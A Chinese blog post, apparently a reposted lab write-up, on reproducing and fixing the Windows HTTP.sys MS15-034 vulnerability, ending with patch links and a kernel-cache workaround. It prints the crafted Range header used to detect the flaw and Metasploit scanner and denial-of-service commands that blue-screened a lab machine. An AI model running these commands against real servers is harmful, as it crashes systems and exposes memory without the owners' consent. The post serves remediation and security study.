HTTP.sys远程代码执行漏洞修复

这篇具有很好参考价值的文章主要介绍了HTTP.sys远程代码执行漏洞修复。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

1.漏洞描述

Http.sys是Microsoft Windows处理HTTP请求的内核驱动程序。HTTP.sys会错误解析某些特殊构造的HTTP请求,导致远程代码执行漏洞。成功利用此漏洞后,攻击者可在System帐户上下文中执行任意代码。由于此漏洞存在于内核驱动程序中,攻击者也可以远程导致操作系统蓝屏。此次受影响的系统中,Windows7、Windows8、WindowsServer 2008 R2和WindowsServer 2012所带的HTTP.sys驱动均存在一个远程代码执行漏洞,远程攻击者可以通过IIS7(或更高版本)服务将恶意的HTTP请求传递给HTTP.sys驱动,通过发送恶意的HTTP请求导致远程代码执行或操作系统蓝屏。

2.复现环境

win7+IIS7

3.漏洞确认

访问IIS界面,使用burpsuite抓包,发送到repeater中,在HTTP请求头中加入如下字段
Range: bytes=18-18446744073709551615 ,返回416状态码
windows http.sys,信息安全工程师,http,linux,microsoft

4.漏洞利用

使用kali的metasploit
msconsole
search ms15-034
windows http.sys,信息安全工程师,http,linux,microsoft
验证漏洞的方法
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
set rhosts 192.168.1.200
run
windows http.sys,信息安全工程师,http,linux,microsoft
利用漏洞的方法
use auxiliary/dos/http/ms15_034_ulonglongadd
set rhosts 192.168.1.200
set threads 10
run
windows http.sys,信息安全工程师,http,linux,microsoft
实验电脑已经蓝屏

5.漏洞修复

方法1:微软官方网站下载ms15-034的补丁包
下载地址:Microsoft 安全公告 MS15-034 - 严重 | Microsoft Learn
代表性补丁:
Windows Server 2008 R2(KB3042553):Download Windows Server 2008 R2 x64 Edition 安全更新程序 (KB3042553) from Official Microsoft Download Center
Windows Server 2012(KB3042553):Download Windows Server 2012 安全更新程序 (KB3042553) from Official Microsoft Download Center
Windows Server 2012 R2(KB3042553):Download Windows Server 2012 R2 安全更新程序 (KB3042553) from Official Microsoft Download Center

方法2:网上的其他方法验证
IIS-功能视图-输出缓存-操作-编辑功能设置-启用内核缓存,取消勾选。
注意:
在网站-default web site下的输出缓存,不是根目录下的输出缓存;
修改后,漏洞验证仍显示存在,但漏洞利用已不再蓝屏;文章来源地址https://www.toymoban.com/news/detail-787378.html

到了这里,关于HTTP.sys远程代码执行漏洞修复的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【Microsoft Message Queuing远程代码执行漏洞(CVE-2023-21554)漏洞修复】

    Windows 消息队列服务是一个Windows组件,需要系统启用该组件才能利用此漏洞,该组件可以通过控制面板添加。Microsoft Message Queuing中存在远程代码执行漏洞,未经身份验证的远程攻击者通过向MSMQ服务器发送特制的恶意MSMQ数据包触发此漏洞,最终实现在服务器端远程代码执行,

    2024年02月15日
    浏览(45)
  • CVE-2018-0886-Microsoft Windows CredSSP 远程执行代码漏洞复现

    cve-2018-0886,网络

    2024年02月12日
    浏览(34)
  • Windows支持诊断工具(MSDT)远程代码执行漏洞:CVE-2022-30190学习及复现

    Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability对应的cve编号为CVE-2022-30190,其能够在非管理员权限、禁用宏且在windows defender开启的情况下绕过防护,达到上线的效果。 当从Word等应用程序使用 URL 协议调用 MSDT 时存在远程执行代码漏洞,攻击者通过制作恶意的

    2024年02月08日
    浏览(56)
  • MS08-067远程代码执行漏洞(CVE-2008-4250) | Windows Server服务RPC请求缓冲区溢出漏洞复现

    What is SMB? SMB(Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和

    2024年02月08日
    浏览(39)
  • 慢速 HTTP 攻击 Slow HTTP Attack漏洞原理以及修复方法

    漏洞名称 :Slow Http attack、慢速攻击 漏洞描述 :慢速攻击基于HTTP协议,通过精心的设计和构造,这种特殊的请求包会造成服务器延时,而当服务器负载能力消耗过大即会导致拒绝服务。HTTP协议规定,HTTP Request以rnrn(0d0a0d0a)结尾表示客户端发送结束,服务端开始处理。那

    2024年01月19日
    浏览(41)
  • 解决 远程 服务器--Microsoft Windows CredSSP 远程执行代码漏洞(CVE-2018-0886)【原理扫描】(KB4103725 或 KB4103715)

    系统: windows server 2012 R2 standard 扫描出漏洞: Microsoft Windows CredSSP 远程执行代码漏洞(CVE-2018-0886)【原理扫描】 按照微软官方给的答案: https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-0886,对应下载安装包是 KB4103725 或 KB4103715 但是下载后安装 报错: 此更新不适用此

    2024年02月06日
    浏览(69)
  • 漏洞修复-检测到目标URL存在http host头攻击漏洞

    这个漏洞通常表示目标URL会被截取,攻击者可以通过修改请求头中的”host”属性,导致最后导向的目标主机被篡改。漏洞说明如下: ModHeader它可以用来伪造HTTP请求头,包含覆盖Chrome浏览器请求头的默认值。可在Chrome拓展程序中搜索安装。 访问网站,页面正常 2.通过ModHeade

    2024年02月06日
    浏览(44)
  • nginx漏洞修复之检测到目标URL存在http host头攻击漏洞

    为了方便的获得网站域名,开发人员一般依赖于HTTP Host header。例如,在php里用_SERVER[“HTTP_HOST”]。但是这个header是不可信赖的,如果应用程序没有对host header值进行处理,就有可能造成恶意代码的传入。 绿盟建议: web应用程序应该使用SERVER_NAME而不是host header。 在Apache和Ng

    2024年02月16日
    浏览(54)
  • 修复nginx 可通过HTTP获取远端WWW服务信息 漏洞

    当前版本是1.22.1编译安装的 在原先nginx-1.22.1目录下重新编译然后把新加模块的nginx执行文件复制到nginx安装目录下重新启动,或者平滑升级一下就可以了 要先停止n   ginx  nginx -s stop 下载  Nginx  扩展  headers-more-nginx-module wget https://github.com/openresty/headers-more-nginx-module/archive/

    2024年02月13日
    浏览(36)
  • 漏洞修复:在应用程序中发现不必要的 Http 响应头

    blablabla描述,一般是在返回的响应表头中出现了Server键值对,那我们要做的就是移除它,解决方案中提供了nginx的解决方案 第一种解决方案 当前解决方案会隐藏nginx的版本号,但还是会返回nginx字样,如果想再彻底点,参考第二种解决方案 or 第二种解决方案 当前方法需要安装

    2024年02月09日
    浏览(39)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包